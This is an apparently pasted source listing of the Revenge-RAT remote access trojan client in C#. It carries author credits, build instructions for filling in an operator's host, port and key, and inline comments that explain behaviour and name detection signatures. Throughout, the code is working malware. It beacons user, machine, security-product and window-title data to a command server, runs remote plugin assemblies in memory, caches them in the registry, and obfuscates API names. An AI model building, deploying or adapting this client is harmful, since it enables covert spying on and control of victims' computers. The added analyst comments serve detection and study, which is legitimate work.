
Untitled

a guest
Nov 17th, 2019
  1.  
  2. //Revenge-RAT Client Source Code v0.3 Rewritten in C# By MiraculousDZ
  3. //Original Author (VB.NET): N A P O L E O N
  4. //FB:MiraculousDZ == Skype:live:miraculous_dz_1
  5. //Last edit: 2017/04/20
  6. //To use for education purposes only
  7. //Thanks To : N A P O L E O N == THE MYSTERIES LEGACY == Grandfather's Legacy
  8.  
  9. using Microsoft.VisualBasic;
  10. using Microsoft.VisualBasic.Devices;
  11. using Microsoft.Win32;
  12. using System;
  13. using System.Collections;
  14. using System.Collections.Generic;
  15. using System.Data;
  16. using System.Diagnostics;
  17. using System.Globalization;
  18. using System.IO;
  19. using System.IO.Compression;
  20. using System.Management;
  21. using System.Net;
  22. using System.Net.Sockets;
  23. using System.Reflection;
  24. using System.Runtime.InteropServices;
  25. using System.Text;
  26. using System.Threading;
  27. using System.Windows.Forms;
  28.  
  29. namespace Miraculous_DZ
  30. {
  31. public static class Class1
  32. {
  33.  
  34. #region Fields Definition
  // Shared state and build-time configuration for the client.
  // Per the inline notes, HOST/PORT/ID/KEY/XMUT/RE hold placeholders that are substituted
  // per build, so their concrete values differ between samples and are weak indicators.
  // SPL is a fixed literal: Send() appends it to every outgoing message and RC() uses it to
  // frame incoming ones, which makes it a candidate network signature for this listing.
  // XMUT names the run-once mutex (see INS) and, Base64-encoded, the HKCU\Software subkey
  // under which INV() stores plugin blobs.
  35. public static bool ZE = false;
  36. public static TcpClient TC = null;
  37. public static bool CZ = false;
  38. public static int PING = 1;
  39. public static int PONG = 0;
  40. public static string RE = "1500"; //Replace %RE% for reconnect time in ms like 1500 or 2000
  41. public static string[] HOST = Strings.Split(",", ",", -1, Microsoft.VisualBasic.CompareMethod.Text); //Replace "%H%" with you host == you must add "," after all host ! == like this "127.0.0.1,"
  42. public static string[] PORT = Strings.Split(",", ",", -1, Microsoft.VisualBasic.CompareMethod.Text); //Replace "%P%" with you port == you must add "," after all port ! == like this "92,"
  43. public static string ID = ""; //Replace "%ID%" with your identification encoded in base64 UTF-8 like "Q2xpZW50"
  44. public static string XMUT = "%MUT%"; //Mutex:RunOnce
  45. public static string KEY = ""; //Replace "%Socket Key%" with your Socket Key
  46. public static int H = 0;
  47. public static int P = 0;
  48. public static string App = Application.ExecutablePath;
  49. public static ComputerInfo CI = new ComputerInfo();
  50. public static Mutex MUT;
  51. public static string SPL = "*-]NK[-*";
  52. #endregion
  53.  
  54. #region Main
  55.  
  // Process entry point; it does nothing except hand off to GO().
  56. [STAThread]
  57. public static void Main()
  58. {
  59. GO();
  60. }
  // Starts the two background threads the client runs on: RC (connect/receive loop) and
  // PIP (counter used in the ping reply). The second argument to the RC thread constructor
  // is the maxStackSize parameter. INS() is not called here or anywhere else in this listing.
  61. public static void GO()
  62. {
  63. new Thread(new ThreadStart(RC), 1).Start();
  64. new Thread(new ThreadStart(PIP)).Start();
  65. } //Connect
  // Endless counter loop: while PING is 0 it increments PONG roughly once per millisecond.
  // Data() sets PING to 0 on "PNC" and reports/resets PONG on "P", so the value sent back is
  // the tick count between those two server messages. The loop never exits.
  66. public static void PIP()
  67. {
  68. DR:
  69. if (PING == 0)
  70. {
  71. PONG += 1;
  72. }
  73. Thread.Sleep(1);
  74. goto DR;
  75. } //Ping Client
  // Single-instance guard: after a 9 second sleep it creates the named mutex XMUT and
  // terminates the process when another instance already owns it (ZE == false).
  // The ReleaseMutex call sits after Environment.Exit, and every exception is swallowed.
  // Nothing in this listing calls INS(). For host triage, the mutex name is the build-specific
  // XMUT value, so it identifies one build rather than the family.
  76. public static void INS()
  77. {
  78. Thread.Sleep(9000);
  79. try
  80. {
  81. MUT = new Mutex(true, XMUT, out ZE);
  82. if (!ZE)
  83. {
  84. System.Environment.Exit(0);
  85. MUT.ReleaseMutex();
  86. }
  87. }
  88. catch
  89. {
  90. }
  91. } //Client Install
  // Command dispatcher for one framed message received from the remote side.
  // The message is decoded with BS() and split on KEY; DZ[0] is the command and every other
  // field is remote-controlled and used without validation (as type names, registry names,
  // Base64 assembly payloads and parsed numbers). Commands handled here:
  //   "PNC" - start the ping counter and echo "PNC".
  //   "P"   - report and reset PONG, then send the active window title ("W" message).
  //   "IE"  - run a plugin previously cached in the registry, or answer "GPL ... false".
  //   "LP"  - load and start a plugin supplied inline in the message.
  //   "UNV" - load an assembly from DZ[1] and invoke a method on type DZ[2].
  // Index errors on short messages are not caught here; RC() runs this on its own thread.
  92. public static void Data(byte[] BB) //Receive Data from Server
  93. {
  94.  
  95. string[] DZ = Strings.Split(BS(BB), KEY, -1, Microsoft.VisualBasic.CompareMethod.Text);
  96. if (DZ[0] == "PNC")
  97. {
  98. PING = 0;
  99. Send("PNC");
  100. }
  101. else if (DZ[0] == "P")
  102. {
  103. PING = 1;
  104. Send("P" + KEY + PONG);
  105. PONG = 0;
  106. Send("W" + KEY + GAW());
  107. }
  108. else if (DZ[0] == "IE") //Ask about plugin
  109. {
  // The cache location is HKCU\Software\<Base64(XMUT)>\<DZ[1]>; the value named DZ[1] holds
  // the plugin blob that is handed to INV() as its Bytes argument.
  110. if ((Registry.CurrentUser.OpenSubKey("Software\\" + Encode(XMUT) + "\\" + DZ[1], true) != null))
  111. {
  112. try
  113. {
  114. INV(HOST[H], PORT[P], DZ[4], DZ[5], Encode(Decode(ID) + "_" + DWF()), Registry.GetValue(@"HKEY_CURRENT_USER\SOFTWARE\" + Encode(XMUT) + @"\\" + DZ[1], DZ[1], null).ToString(), int.Parse(DZ[2]), System.Convert.ToBoolean(DZ[3]), DZ[1], true);
  115. }
  116. catch
  117. {
  118. Send("GPL" + KEY + DZ[5] + KEY + DZ[1] + KEY + "false");
  119. }
  120. }
  121. else
  122. {
  123. Send("GPL" + KEY + DZ[5] + KEY + DZ[1] + KEY + "false");
  124. }
  125. }
  126. else if (DZ[0] == "LP") //invoke plugin
  127. {
  128. INV(HOST[H], PORT[P], DZ[1], DZ[2], Encode(Decode(ID) + "_" + DWF()), DZ[3], int.Parse(DZ[4]), System.Convert.ToBoolean(DZ[5]), DZ[6], Convert.ToBoolean(DZ[7]));
  129. }
  130. else if (DZ[0] == "UNV") //uninstall - restart - close .. etc
  131. {
  // The three byte arrays decode to "GetType", "GetMethod" and "Invoke", and { 85, 78, 73 }
  // decodes to "UNI": the member names are assembled at run time and called late-bound via
  // Interaction.CallByName, so they do not appear as plain string literals in the binary.
  132. object ar = Interaction.CallByName(LA(DZ[1]), System.Text.Encoding.Default.GetString(new byte[] { 71, 101, 116, 84, 121, 112, 101 }), CallType.Method, DZ[2]);
  133. object enn = Interaction.CallByName(ar, System.Text.Encoding.Default.GetString(new byte[] { 71, 101, 116, 77, 101, 116, 104, 111, 100 }), CallType.Method, System.Text.Encoding.Default.GetString(new byte[] { 85, 78, 73 }));
  134. object inn = Interaction.CallByName(enn, System.Text.Encoding.Default.GetString(new byte[] { 73, 110, 118, 111, 107, 101 }), CallType.Method, null, new object[] { Encode(XMUT), DZ[3], null, null, null, null, null, null, null, null,
  135. null, null, null, null, null, null, null, null, null, null,
  136. null, null, null, null, null, null, null, null, null, null,
  137. null, null, DZ[4], DZ[5], App, DZ[6], DZ[7], DZ[8], DZ[9], DZ[10],
  138. DZ[11], DZ[12], DZ[13]});
  139.  
  140. }
  141. }
  142. #endregion
  143.  
  144. #region Plugins
  // Loads a plugin assembly from the Base64 blob in Bytes and starts it.
  //   H, P   - host and port passed through to the plugin.
  //   N, C   - joined as N + "." + C and used as the type name to instantiate.
  //   ID, S  - passed through to the plugin's Start call together with KEY and SPL.
  //   M      - when true, the blob is also written to the registry cache.
  //   MD5    - used only as the registry subkey and value name; nothing is hashed here.
  //   B      - when false (and M is true), the registry value is written unconditionally.
  // ci and vod decode to "CreateInstance" and "Start"; gem ("GetMethod") and invo ("Invoke")
  // are declared but not used in this method.
  // For host triage: the cache is a string value holding a Base64 blob under
  // HKCU\SOFTWARE\<Base64(XMUT)>\<MD5>, so the plugin need not exist as a file on disk.
  145. public static void INV(string H, string P, string N, string C, string ID, string Bytes, int S, bool M, string MD5, bool B) //invoke plugin function
  146. {
  147. byte[] ci = new byte[] { 67, 114, 101, 97, 116, 101, 73, 110, 115, 116, 97, 110, 99, 101 };
  148. byte[] gem = new byte[] { 71, 101, 116, 77, 101, 116, 104, 111, 100 };
  149. byte[] invo = new byte[] { 73, 110, 118, 111, 107, 101 };
  150. byte[] vod = new byte[] { 83, 116, 97, 114, 116 };
  151. object ar = Interaction.CallByName(LA(Bytes), System.Text.Encoding.Default.GetString(ci), CallType.Method, N + "." + C);
  152. object inn = Interaction.CallByName(ar, System.Text.Encoding.Default.GetString(vod), CallType.Method, new object[] { ID, S, H, P, KEY, SPL });
  153. if (M)
  154. {
  155. try
  156. {
  157. if (Registry.CurrentUser.OpenSubKey("Software\\" + Encode(XMUT) + "\\" + MD5, true) == null)
  158. {
  159. IR("HKEY_CURRENT_USER\\SOFTWARE\\" + Encode(XMUT) + "\\" + MD5, MD5, Bytes);
  160. }
  161. }
  162. catch
  163. {
  164. }
  165. if (B == false)
  166. {
  167. IR("HKEY_CURRENT_USER\\SOFTWARE\\" + Encode(XMUT) + "\\" + MD5, MD5, Bytes);
  168. }
  169. }
  170. }
  // Loads an assembly from memory: B is Base64-decoded, passed through Decompress(), and the
  // resulting bytes are handed to a late-bound call on AppDomain.CurrentDomain whose method
  // name, { 76, 111, 97, 100 }, decodes to "Load". Returns whatever that call returns.
  // This method writes nothing to disk, so file-based scanning does not see the payload;
  // runtime assembly-load telemetry is the more relevant data source.
  171. public static object LA(string B) //load assembly
  172. {
  173. byte[] lod = new byte[] { 76, 111, 97, 100 };
  174. Object ap = System.AppDomain.CurrentDomain;
  175. return Interaction.CallByName(ap, System.Text.Encoding.Default.GetString(lod), CallType.Method, Decompress(Convert.FromBase64String(B)));
  176. }
  // Writes registry value N with data B under key path P via Registry.SetValue.
  // Any failure is swallowed, so callers cannot tell whether the write happened.
  177. public static void IR(string P, string N, string B) //add reg value
  178. {
  179. try
  180. {
  181.  
  182. Registry.SetValue(P, N, B);
  183. }
  184. catch
  185. {
  186. }
  187. }
  188. #endregion
  189.  
  190. #region Functions
  // Resolves the local host name and returns the first address in the result as a string;
  // returns "????" if the lookup throws. The value is one field of the beacon built in RC().
  191. public static string IP() //Get internal IP
  192. {
  193. try
  194. {
  195. return ((IPAddress)Dns.GetHostByName(Dns.GetHostName()).AddressList.GetValue(0)).ToString();
  196. }
  197. catch
  198. {
  199. return "????";
  200. }
  201. }
  // Calls GVI (imported below as kernel32 GetVolumeInformationA) on the root of %SystemDrive%
  // and returns the value written to its fourth argument as a hex string, or "ERR" on failure.
  // In the Win32 API that argument is the volume serial number, not a physical disk serial.
  // The result is appended to the client identifier in Data() and RC(), so it acts as a
  // per-machine ID in the traffic.
  202. public static string DWF() //Get Hard Disk Serial Number
  203. {
  204. try
  205. {
  206. string trt = Interaction.Environ("SystemDrive") + "\\";
  207. string trrt = null;
  208. int trtt = 0;
  209. int tyt = 0;
  210. int tytr = 0;
  211. string trrtr = null;
  212. int number = 0;
  213. GVI(trt, trrt, trtt, ref number, ref tyt, ref tytr, trrtr, 0);
  214. return Conversion.Hex(number);
  215. }
  216. catch
  217. {
  218. return "ERR";
  219. }
  220. }
  // Probes driver indexes 0 through 4 with the CAWP import (avicap32.dll) and returns "Yes"
  // as soon as one call returns true; otherwise, or if anything throws, returns "No".
  // The answer is reported to the remote side in the beacon built in RC().
  221. public static string CIVC()
  222. {
  223. string hh = null;
  224. string hhh = Strings.Space(100);
  225. try
  226. {
  227. for (int i = 0; i <= 4; i++)
  228. {
  229. if (CAWP((short)i, hhh, 100, hh, 100))
  230. {
  231. return "Yes";
  232. }
  233. }
  234. }
  235. catch
  236. {
  237. }
  238. return "No";
  239. } //Check Camera return yes or no
  // Runs the WMI query "select * from Win32_Processor" and returns the AddressWidth of the
  // first result as a string. Returns "????" when the query throws or yields no rows.
  240. public static string OP()
  241. {
  242. try
  243. {
  244. foreach (ManagementObject SC in new ManagementObjectSearcher("select * from Win32_Processor").Get())
  245. {
  246. return Convert.ToInt32(SC["AddressWidth"]).ToString();
  247. }
  248. }
  249. catch
  250. {
  251. return "????";
  252. }
  253. return "????";
  254.  
  255. } //Get operation system 32 or 64 bit
  // Runs the WQL query in Product against the WMI namespace root\SecurityCenter (when the OS
  // name contains "XP") or root\SecurityCenter2 (otherwise), concatenates the displayName of
  // every result, and returns it Base64-encoded. Returns Base64("N/A") when nothing is found
  // or the query throws.
  // RC() calls this with AntiVirusProduct and FirewallProduct queries, i.e. it inventories
  // the installed security products; such SecurityCenter2 queries from an unrelated process
  // are worth alerting on.
  256. public static string GPRO(string Product) //Get Product via ManagementObjectSearcher
  257. {
  258. try
  259. {
  260. string PN = string.Empty;
  261. foreach (ManagementObject AV in new ManagementObjectSearcher("root\\SecurityCenter" + (CI.OSFullName.Contains("XP") ? "" : "2").ToString(), Product).Get())
  262. {
  263. PN += AV["displayName"];
  264. }
  265. if ((PN != string.Empty))
  266. {
  267. return Encode(PN);
  268. }
  269. else
  270. {
  271. return Encode("N/A");
  272. }
  273. }
  274. catch
  275. {
  276. return Encode("N/A");
  277. }
  278. }
  // Reads ProcessorNameString from the CENTRALPROCESSOR\0 key under HKEY_LOCAL_MACHINE and
  // returns it; returns "????" if the read throws (including a null result).
  279. public static string MP()
  280. {
  281. try
  282. {
  283. return Registry.GetValue("HKEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\SYSTEM\\CENTRALPROCESSOR\\0", "ProcessorNameString", null).ToString();
  284. }
  285. catch
  286. {
  287. return "????";
  288. }
  289. } // Get CPU
  // Reads the title of the current foreground window (GFW + GetWindowText, up to the
  // 256-character builder capacity) and returns it Base64-encoded.
  // The title is sent in the initial beacon and again after every "P" message handled in
  // Data(), so window titles leave the host continuously while a session is up.
  290. public static string GAW()
  291. {
  292. StringBuilder W = new StringBuilder(256);
  293. GetWindowText(GFW(), W, W.Capacity);
  294. return Encode(W.ToString());
  295. } //Get Active Window
  296. #endregion
  297.  
  298. #region Network
  // Connection and receive loop; runs forever on its own thread (started from GO()).
  // Label "re": while connected, appends available socket bytes to a MemoryStream and, each
  //   time the buffer contains SPL, splits it with fx(), runs Data() on the first part in a new
  //   thread and keeps the remainder as the new buffer.
  // Label "e": on any error or lost connection, drops the socket and tries HOST[i]:PORT[i]
  //   for each configured pair, sleeping RE milliseconds after a failed attempt.
  // After a successful connect it sends one beacon message whose fields, separated by KEY, are:
  //   "Information", ID, Base64("_" + volume serial), local IP, Base64(machine / user),
  //   camera Yes/No, Base64(OS name + address width), Base64(CPU name), total physical memory,
  //   antivirus names, firewall names, port, Base64 window title, Base64 culture name, "RVUS".
  // No encryption or authentication of the channel is visible in this listing: the fields are
  // only Base64-encoded, and the message starts with the literal "Information" and ends with
  // SPL, which gives network monitoring fixed byte sequences to match on.
  299. public static void RC() //Handling Incoming Data
  300. {
  301.  
  302. MemoryStream M = new MemoryStream();
  303. int lp = 0;
  304. re:
  305. try
  306. {
  307. try
  308. {
  309. EmptyWorkingSet(Process.GetCurrentProcess().Handle); //Reduce memory versus performance
  310. }
  311. catch
  312. {
  313. }
  314. }
  315. catch
  316. {
  317. }
  318. try
  319. {
  320. if (TC == null)
  321. goto e;
  322. if (TC.Client.Connected == false)
  323. goto e;
  324. if (CZ == false)
  325. goto e;
  326. lp += 1;
  // Every 151st pass: a blocking Poll for readability that returns with nothing available
  // is treated as a closed connection.
  327. if (lp > 150)
  328. {
  329. lp = 0;
  330. if (TC.Client.Poll(-1, System.Net.Sockets.SelectMode.SelectRead) & TC.Client.Available <= 0)
  331. goto e;
  332. }
  333. if (TC.Available > 0)
  334. {
  335. byte[] B = new byte[TC.Available];
  336. TC.Client.Receive(B, 0, B.Length, System.Net.Sockets.SocketFlags.None);
  337. M.Write(B, 0, B.Length);
  338. rr:
  // Frame extraction: A[0] is the message before the first SPL, A[1] the bytes after it.
  339. if (BS(M.ToArray()).Contains(SPL))
  340. {
  341. Array[] A = (Array[])(fx(M.ToArray(), SPL));
  342. Thread t = new Thread(delegate() { Data((byte[])A[0]); });
  343. t.Start();
  344. M.Dispose();
  345.  
  346. M = new System.IO.MemoryStream();
  347. if (A.Length == 2)
  348. {
  349. M.Write((byte[])(A[1]), 0, ((byte[])(A[1])).Length);
  350. goto rr;
  351. }
  352. }
  353. }
  354. }
  355. catch
  356. {
  357. goto e;
  358. }
  359. Thread.Sleep(1);
  360. goto re;
  361. e:
  362. try
  363. {
  364. try
  365. {
  366. EmptyWorkingSet(Process.GetCurrentProcess().Handle);
  367. }
  368. catch
  369. {
  370. }
  371. }
  372. catch
  373. {
  374. }
  375. CZ = false;
  376. try
  377. {
  378. TC.Client.Disconnect(false);
  379. }
  380. catch
  381. {
  382. }
  383. try
  384. {
  385. M.Dispose();
  386. }
  387. catch
  388. {
  389. }
  390. M = new MemoryStream();
  391. bool IC = false;
  // The upper bound skips the last array element, matching the trailing "," convention
  // described on the HOST/PORT fields.
  392. for (int Count = 0; Count <= HOST.Length - 2; Count++)
  393. {
  394. try
  395. {
  396. TC = new TcpClient();
  397. {
  398. TC.ReceiveTimeout = -1;
  399. TC.SendTimeout = -1;
  400. TC.SendBufferSize = 999999;
  401. TC.ReceiveBufferSize = 999999;
  402. }
  403. lp = 0;
  404. TC.Client.Connect(HOST[Count], Convert.ToInt16(PORT[Count]));
  405. CZ = true;
  406. Send("Information" + KEY + ID + KEY + Encode("_" + DWF()) + KEY + IP() + KEY + Encode(Environment.MachineName + " / " + Environment.UserName) + KEY + CIVC() + KEY + Encode(CI.OSFullName + " " + OP()) + KEY + Encode(MP()) + KEY + CI.TotalPhysicalMemory + KEY + GPRO("Select * from AntiVirusProduct") + KEY + GPRO("SELECT * FROM FirewallProduct") + KEY + PORT[P] + KEY + GAW() + KEY + Encode(CultureInfo.CurrentCulture.Name) + KEY + @"RVUS"); // RVUS for make this client special color in lv , true for spread , RVUS for you , and false mean this client didn't come from spread
  407. H = Count;
  408. P = Count;
  409. IC = true;
  410. goto re;
  411. }
  412. catch
  413. {
  414. Thread.Sleep(int.Parse(RE));
  415. H = 0;
  416. P = 0;
  417. }
  418. }
  419. if (IC == true)
  420. {
  421. IC = false;
  422. goto e;
  423. }
  424. goto re;
  425. }
  // Sends one framed message: the payload bytes followed by the SPL terminator.
  // Returns silently when the connection flag CZ is false. The socket send buffer size is set
  // to the payload length before each send, and Poll(-1, SelectWrite) waits until the socket
  // is writable. Any exception clears CZ, which makes RC() drop and re-establish the
  // connection. The payload is written to the socket as-is; nothing here encrypts it.
  426. public static void Send(byte[] b) //Send Data
  427. {
  428. if (CZ == false)
  429. return;
  430. try
  431. {
  432. MemoryStream r = new MemoryStream();
  433. r.Write(b, 0, b.Length);
  434. r.Write(SB(SPL), 0, SPL.Length);
  435. TC.Client.SendBufferSize = b.Length;
  436. TC.Client.Poll(-1, System.Net.Sockets.SelectMode.SelectWrite);
  437. TC.Client.Send(r.ToArray(), 0, checked((int)r.Length), System.Net.Sockets.SocketFlags.None);
  438. r.Dispose();
  439. }
  440. catch
  441. {
  442. CZ = false;
  443. }
  444. }
  // String overload: converts S to bytes with SB() and forwards to Send(byte[]).
  445. public static void Send(string S) //Send Data
  446. {
  447. Send(SB(S));
  448. }
  449. #endregion
  450.  
  451. #region Encoding
  // Converts a string to bytes with Encoding.Default, so the bytes on the wire depend on the
  // default encoding of the runtime the client executes on.
  452. public static byte[] SB(string s)
  453. {
  454. return Encoding.Default.GetBytes(s);
  455. } // String to Byte
  // Converts bytes to a string with Encoding.Default; the inverse of SB() for text that the
  // default encoding can represent.
  456. public static string BS(byte[] b)
  457. {
  458. return Encoding.Default.GetString(b);
  459. } // Byte to String
  // Splits buffer b at the first occurrence of the delimiter WRD and returns a two-element
  // array of byte[]: the bytes before the delimiter and the bytes after it.
  // Offsets are taken from the character length of the decoded string (T[0].Length), so the
  // split assumes one byte per character in Encoding.Default.
  // NOTE(review): Strings.Split is called with CompareMethod.Text, so delimiter matching is
  // text-based rather than binary.
  460. public static Array fx(byte[] b, string WRD)
  461. {
  462. List<byte[]> a = new List<byte[]>();
  463. MemoryStream M = new MemoryStream();
  464. MemoryStream MM = new MemoryStream();
  465. string[] T = Strings.Split(BS(b), WRD, -1, Microsoft.VisualBasic.CompareMethod.Text);
  466. M.Write(b, 0, T[0].Length);
  467. MM.Write(b, T[0].Length + WRD.Length, b.Length - (T[0].Length + WRD.Length));
  468. a.Add(M.ToArray());
  469. a.Add(MM.ToArray());
  470. M.Dispose();
  471. MM.Dispose();
  472. return (a.ToArray());
  473. } // fix incomming Data(bytes)
  // Inflates a GZip-wrapped blob. The output size is not derived from the stream itself: four
  // bytes starting five bytes before the end of B are read as an Int32 and used as the
  // length of the output array, then a single GZipStream.Read call fills it.
  // The size field therefore comes from the same remote-supplied blob as the data. Together
  // with LA() this fixes the plugin encoding seen in traffic and in the registry cache as
  // Base64 over GZip, which is what an analyst needs to unpack a captured plugin offline.
  474. public static byte[] Decompress(byte[] B) // Decompress Bytes with GZipStream
  475. {
  476. MemoryStream ms = new MemoryStream(B);
  477. GZipStream gzipStream = new GZipStream((Stream)ms, CompressionMode.Decompress);
  478. byte[] buffer = new byte[4];
  479. ms.Position = checked(ms.Length - 5L);
  480. ms.Read(buffer, 0, 4);
  481. int count = BitConverter.ToInt32(buffer, 0);
  482. ms.Position = 0L;
  483. byte[] AR = new byte[checked(count - 1 + 1)];
  484. gzipStream.Read(AR, 0, count);
  485. gzipStream.Dispose();
  486. ms.Dispose();
  487. return AR;
  488. }
  // Returns the Base64 form of the UTF-8 bytes of str. This is an encoding, not encryption:
  // every field wrapped with it in the beacon and replies can be decoded by an observer.
  489. public static string Encode(string str)
  490. {
  491. return Convert.ToBase64String(Encoding.UTF8.GetBytes(str));
  492. } // Encode string UTF-8
  // Inverse of Encode(): Base64-decodes str and interprets the bytes as UTF-8 text.
  // Convert.FromBase64String throws on malformed input; this method does not catch it.
  493. public static string Decode(string str)
  494. {
  495. return Encoding.UTF8.GetString(Convert.FromBase64String(str));
  496. } // Decode string UTF-8
  497. #endregion
  498.  
  499. #region PInvokes
  500.  
  // Native imports used by the client, declared under shortened managed names:
  //   GVI             - kernel32 GetVolumeInformationA (machine identifier in DWF()).
  //   GFW             - user32 GetForegroundWindow     (active window handle in GAW()).
  //   GetWindowText   - user32                         (active window title in GAW()).
  //   CAWP            - avicap32.dll                   (capture-driver probe in CIVC()).
  //   EmptyWorkingSet - psapi                          (called on each RC() loop pass).
  // For static triage, this set of P/Invoke declarations in a small .NET executable that also
  // references Microsoft.VisualBasic, System.Management and System.Net.Sockets is a useful
  // clustering feature alongside the SPL literal.
  501. [DllImport("kernel32", EntryPoint = "GetVolumeInformationA", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
  502. private static extern int GVI(string IP, string V, int T, ref int H, ref int Q, ref int G, string J, int X);
  503. [DllImport("user32", EntryPoint = "GetForegroundWindow", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
  504. private static extern IntPtr GFW();
  505. [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
  506. static extern int GetWindowText(IntPtr hWnd, StringBuilder lpString, int nMaxCount);
  507. [DllImport("avicap32.dll", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
  508. public static extern bool CAWP(short wDriver, string lpszName, int cbName, string lpszVer, int cbVer);
  509. [DllImport("psapi")]
  510. public static extern bool EmptyWorkingSet(IntPtr hProcess);
  511.  
  512. #endregion
  513. }
  514. }